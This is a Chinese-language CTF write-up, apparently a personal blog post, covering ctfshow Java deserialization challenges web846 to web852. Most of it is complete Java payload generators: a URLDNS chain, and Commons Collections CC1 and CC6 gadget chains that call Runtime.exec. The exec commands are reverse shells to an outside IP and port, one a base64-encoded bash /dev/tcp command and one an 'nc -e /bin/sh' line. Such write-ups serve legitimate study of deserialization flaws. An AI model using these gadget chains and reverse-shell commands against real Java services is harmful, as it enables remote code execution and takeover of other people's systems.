ctfshow-java反序列化

wea5e1 Lv1
  2026-02-08 20:54:50 2026-02-08 20:54:50 创建   2026-02-08 20:55:15 2026-02-08 20:55:15 更新  

CTFSHOW-java反序列化

web846

1
2
3
ctfshow会对你post提交的ctfshow参数进行base64解码
然后进行反序列化
构造出对当前题目地址的dns查询即可获得flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
package com.wea5e1;

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.Base64;
import java.util.HashMap;


public class ctfshow846 {
    public static void main(String[] args) throws Exception {
        HashMap h=new HashMap();
        URL url=new URL("https://b3f77a0b-169e-4e71-bf88-42040c3a87d7.challenge.ctf.show/");
        Class cls=Class.forName("java.net.URL");
        Field f = cls.getDeclaredField("hashCode");
        f.setAccessible(true);
        f.set(url,1);
        h.put(url,1);
        f.set(url,-1);

        ByteArrayOutputStream b = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(b);
        oos.writeObject(h);

        String payload = Base64.getEncoder().encodeToString(b.toByteArray());
        System.out.println(payload);
    }
}

然后url全编码就行了

web847

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class show847 {
    public static void main(String[] args) throws Exception {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                // 保留你的反弹 Shell 命令
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwMS4yMDEuMTE5LjE1OC8yMzMzIDA+JjE}|{base64,-d}|{bash,-i}"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        // 这里的 Key 必须是 "value",因为 Target 注解里有 value() 方法
        map.put("value", "sometext");
        
        Map<Object, Object> transformedMap = TransformedMap.decorate(map, null, chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor AnnotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        AnnotationInvocationHandlerConstructor.setAccessible(true);
        
        Object o = AnnotationInvocationHandlerConstructor.newInstance(Target.class, transformedMap);
        
        ByteArrayOutputStream b = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(b);
        oos.writeObject(o);
        oos.close();

        String payload = Base64.getEncoder().encodeToString(b.toByteArray());
        System.out.println("Payload 生成成功:");
        System.out.println(payload);
    }
}

CC1的第一条链子直接打

web848

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections11 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
                        String.class,
                        Class[].class}, new Object[]{"getRuntime",
                        new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class,
                        Object[].class}, new Object[]{null, new Object[0]
                }),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{
                                "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwMS4yMDEuMTE5LjE1OC8yMzMzIDA+JjE}|{base64,-d}|{bash,-i}"}),
        };

        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();

        Map outerMap = LazyMap.decorate(innerMap, transformerChain);
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
        handler = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);
        ByteArrayOutputStream b = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(b);
        oos.writeObject(handler);
        oos.close();

        String payload = Base64.getEncoder().encodeToString(b.toByteArray());
        System.out.println("Payload 生成成功:");
        System.out.println(payload);
        /*serialize(handler);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }*/
}}

使用的是CC1的另一个链子,反弹shell直接打

web849&web851&Web852

(本来看的851的因为会cc6,没想到打这个打通了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
package com.wea5e1;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import org.apache.commons.collections4.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CC_six_4 {
    public static void main(String[] args) throws Exception{


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"nc 101.201.119.158 2333 -e /bin/sh"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> Outermap = LazyMap.lazyMap(map, new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(Outermap, "test");

        HashMap<Object, Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"test1");
        Outermap.remove("test");

        Class c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(Outermap,chainedTransformer);

        ByteArrayOutputStream b = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(b);
        oos.writeObject(map2);

        String payload = Base64.getEncoder().encodeToString(b.toByteArray());
        System.out.println(payload);

    }
}

使用的是CC6的链子,反弹shell直接打,然后记得 commons-collections4.0 导入 org.apache.commons.collections4

其他的先埋个坑

  • 标题: ctfshow-java反序列化
  • 作者: wea5e1
  • 创建于 : 2026-02-08 20:54:50
  • 更新于 : 2026-02-08 20:55:15
  • 链接: https://hxl-lcm.github.io/2026/02/08/ctfshow-java反序列化/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
ctfshow-java反序列化
  1. CTFSHOW-java反序列化
    1. web846
    2. web847
    3. web848
    4. web849&web851&Web852